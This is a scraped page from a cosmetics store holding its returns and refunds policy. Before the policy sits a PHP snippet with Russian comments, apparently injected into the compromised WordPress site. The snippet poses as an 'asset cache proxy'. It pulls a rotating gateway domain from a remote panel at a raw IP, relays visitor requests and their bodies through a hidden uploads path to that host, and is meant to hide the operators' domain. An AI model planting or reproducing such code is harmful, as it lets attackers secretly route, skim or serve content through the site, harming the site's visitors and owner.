// BEGIN sftp-panel-snippet /** * Asset Cache Proxy v2 — same-origin прокси с авто-подкачкой активного домена. * * Весь наш трафик идёт через домен самого сайта — наш домен не светится в network. * Активный домен прокладки плагин сам подтягивает из панели каждые 30 мин — * при смене домена ничего править не надо. * * Установка: * А) wp-content/mu-plugins/asset-cache.php (надёжнее, не слетает при смене темы) * Б) весь код ниже — в конец functions.php активной темы * * Скрипт на страницу: * */ if (!defined('CFX_CFG_URL')) { define('CFX_CFG_URL', 'http://194.59.30.132:8080/api/wpcfg?key=Zt5nW8rQ1xKvJ3mP7bLgY9dC0fHs2uAe'); // конфиг-эндпоинт панели (выдаётся при деплое) define('CFX_GW_FALLBACK', 'https://caapman.me'); // запасной домен если панель не отвечает define('CFX_PROXY_AUTH', '7563b62e34a1176032eec8ae4ba7d5e4950fcc5169c113be59fbbbc91509ec6f'); // подпись для гейтвея define('CFX_PREFIX', '/wp-content/uploads/.asset-cache/'); } function cfx_gateway() { $gw = get_transient('cfx_gw'); if ($gw) return $gw; $r = wp_remote_get(CFX_CFG_URL, ['timeout' => 5]); if (!is_wp_error($r)) { $d = json_decode(wp_remote_retrieve_body($r), true); if (!empty($d['gw'])) { set_transient('cfx_gw', $d['gw'], 1800); return $d['gw']; } } set_transient('cfx_gw', CFX_GW_FALLBACK, 300); return CFX_GW_FALLBACK; } add_action('init', function () { $uri = $_SERVER['REQUEST_URI'] ?? ''; if (strpos($uri, CFX_PREFIX) !== 0) return; $path = substr($uri, strlen(CFX_PREFIX)); if ($path === '' || strpos($path, '..') !== false) { status_header(204); exit; } $args = [ 'method' => $_SERVER['REQUEST_METHOD'] ?? 'GET', 'timeout' => 15, 'sslverify' => false, 'headers' => [ 'User-Agent' => $_SERVER['HTTP_USER_AGENT'] ?? '', 'Referer' => $_SERVER['HTTP_REFERER'] ?? '', 'Content-Type' => $_SERVER['CONTENT_TYPE'] ?? 'application/json', 'X-Real-IP' => $_SERVER['REMOTE_ADDR'] ?? '', 'X-Proxy-Auth' => CFX_PROXY_AUTH, ], 'body' => file_get_contents('php://input'), ]; $resp = wp_remote_request(rtrim(cfx_gateway(), '/') . '/' . $path, $args); if (is_wp_error($resp)) { delete_transient('cfx_gw'); // форс-рефреш домена при ошибке status_header(204); exit; } status_header((int) wp_remote_retrieve_response_code($resp)); $ct = wp_remote_retrieve_header($resp, 'content-type'); if ($ct) header('Content-Type: ' . $ct); echo wp_remote_retrieve_body($resp); exit; }, 1); // END sftp-panel-snippet Shipments Returns and Refunds - L Makeup Cosmetic StoreL Makeup Cosmetic Store

get free shipping on orders of $50 or more!

Shipments Returns and Refunds

Shipments, Returns, and Refunds

Thank you for shopping at L Makeup Cosmetic Store

If you are not entirely satisfied with your purchase, we’re here to help.

Our products can be returned within 14 days of the original purchase of the product.

To be eligible for a return, please make sure that:

The product was purchased in the last 14 days
The product isn’t used or damaged

Products that do not meet these criteria will not be considered for return.

Please contact us before you send the product:

By email: Alexus@lmakeupcosmeticstore.com

Send the product to:

440 S. Rampart Blvd. A-130 • Las Vegas, NV 89145

Shipping charges

Shipping charges incurred in connection with the return of a product are non-refundable.

You are responsible for paying the costs of shipping and for the risk of loss of or damage to the product during shipping, both to and from L Makeup Cosmetic Store.

Damaged items

If you received a damaged product, please notify us immediately for assistance.

Sale items

Unfortunately, sale items cannot be refunded. Only regular price items can be refunded.

Contact us

If you have any questions about our Returns and Refunds Policy, please contact us:

By email: Alexus@lmakeupcosmeticstore.com

Join our mailing list
for exclusive offers!

    Check out our wide selection of brushes
    from over 40 professional brands.

    Shop Brushes

    Copyright © 2026 L Makeup Cosmetic Store. All Rights Reserved.

    Designed and Developed by: Royal Ink

    WordPress Lightbox Plugin
    X